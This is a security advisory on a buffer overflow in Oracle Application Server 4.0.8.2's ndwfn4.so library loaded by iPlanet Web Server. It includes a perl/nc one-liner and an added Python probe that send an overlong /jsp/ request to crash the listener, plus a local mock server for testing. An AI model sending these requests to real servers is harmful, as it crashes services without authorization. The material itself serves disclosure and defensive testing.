Vulnerability
Oracle

Affected
Oracle Application Server 4.0.8.2 + iWS 4.0/4.1 web server (tested on Solaris)

Description
The following is based on S.A.F.E.R. Security Bulletin 0016. S.A.F.E.R. reproduced the problem on two different machines with very similar setups.

An exploitable buffer overflow exists in a shared library shipped with Oracle Application Server 4.0.8.2 and loaded by iPlanet Web Server (iWS) when iWS is configured as the external web listener for OAS. In that configuration iWS loads $ORAHOME/ows/4.0/lib/ndwfn4.so to handle requests destined for OAS.

The overflow occurs when a request is made for a long URL whose prefix is "linked" to OAS (by default /jsp/); the request is then passed to the library routines for processing. The overflowed buffer is roughly 2050 to 2060 bytes. A request of the form

GET /jsp/<A x 2050> HTTP/1.0

for example

perl -e 'print "GET /jsp/","A"x2050," HTTP/1.0\n\n"' | nc victim 80

triggers the overflow: the iWS web server core-dumps and is restarted by its watchdog, which externally is seen as a dropped connection. Because the probe crashes the listener, run it only against a test instance.

Other versions of OAS, iWS and Solaris may also be vulnerable. S.A.F.E.R. has developed a working exploit for this problem, which will be released publicly. Credit goes to Fyodor Yarochkin.

Solution
Oracle has been contacted but has not been able to reproduce this problem. S.A.F.E.R. would appreciate it if people running OAS/iWS tested this against their servers and reported the results to both teams, since other versions of the software (only Solaris was tested) may be vulnerable as well. The Oracle Security Team would like results sent to secalert_us@oracle.com and S.A.F.E.R. to security@relaygroup.com. No fixes are available at the time of this writing.
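To make the check the advisory asks administrators to run repeatable, here is an added example probe. It is not part of the S.A.F.E.R. bulletin and not an Oracle or S.A.F.E.R. tool. It builds the same GET /jsp/AAA...A HTTP/1.0 request, classifies what the listener does (answers, drops the connection, times out, refuses), and ships with a constructed local stand-in listener so the classifier can be exercised offline. Only the request shape and the 2050-byte padding come from the advisory; the 2048-byte threshold in the stand-in, the optional Host header, and all function and class names are assumptions for illustration.

```python
import socket
import sys
import threading

DEFAULT_PREFIX = "/jsp/"  # prefix "linked" to OAS by default, per the advisory
DEFAULT_PAD = 2050        # padding length used in the advisory's request


def build_request(pad_len=DEFAULT_PAD, prefix=DEFAULT_PREFIX, host=None):
    """Build the advisory's request: GET /jsp/AAAA...A HTTP/1.0.

    A Host header is added when `host` is given (assumption: useful for
    virtual-hosted listeners); the advisory's own request carries none.
    """
    path = prefix + "A" * pad_len
    lines = ["GET %s HTTP/1.0" % path]
    if host:
        lines.append("Host: %s" % host)
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def probe(host, port=80, pad_len=DEFAULT_PAD, timeout=5.0):
    """Send one padded request and classify the listener's behaviour.

    Returns 'response' (server answered), 'dropped' (connection closed or
    reset with no answer: the symptom the advisory describes), 'timeout'
    (nothing within `timeout` seconds) or 'refused' (could not connect).
    """
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return "refused"
    with sock:
        try:
            sock.sendall(build_request(pad_len, host=host))
            data = sock.recv(4096)
        except ConnectionResetError:
            return "dropped"
        except socket.timeout:
            return "timeout"
        except OSError:  # e.g. broken pipe while sending: listener went away
            return "dropped"
    return "response" if data else "dropped"


class MockListener(threading.Thread):
    """Constructed stand-in for the vulnerable listener (NOT iWS/ndwfn4.so).

    Answers requests whose path fits in `limit` bytes and closes the
    connection without answering when the path is longer, mimicking the
    crash-and-restart behaviour the advisory describes. The 2048 limit is
    an assumption chosen to sit just under the advisory's 2050 padding.
    """

    def __init__(self, limit=2048):
        super().__init__(daemon=True)
        self.limit = limit
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            with conn:
                conn.settimeout(2.0)
                head = b""
                while b"\r\n" not in head and len(head) < 65536:
                    try:
                        chunk = conn.recv(4096)
                    except OSError:
                        chunk = b""
                    if not chunk:
                        break
                    head += chunk
                parts = head.split(b" ", 2)
                path = parts[1] if len(parts) == 3 else b""
                if len(path) > self.limit:
                    continue  # "crash": close without answering
                conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nok")


if __name__ == "__main__":
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    print("%s:%d -> %s" % (target, port, probe(target, port)))
```

Run it as `python probe.py testhost 80` against a test instance only; a result of `dropped` for the padded request, while a short path (`pad_len=10`) still gets `response`, matches the symptom the bulletin describes, though a dropped connection alone does not prove the overflow is exploitable.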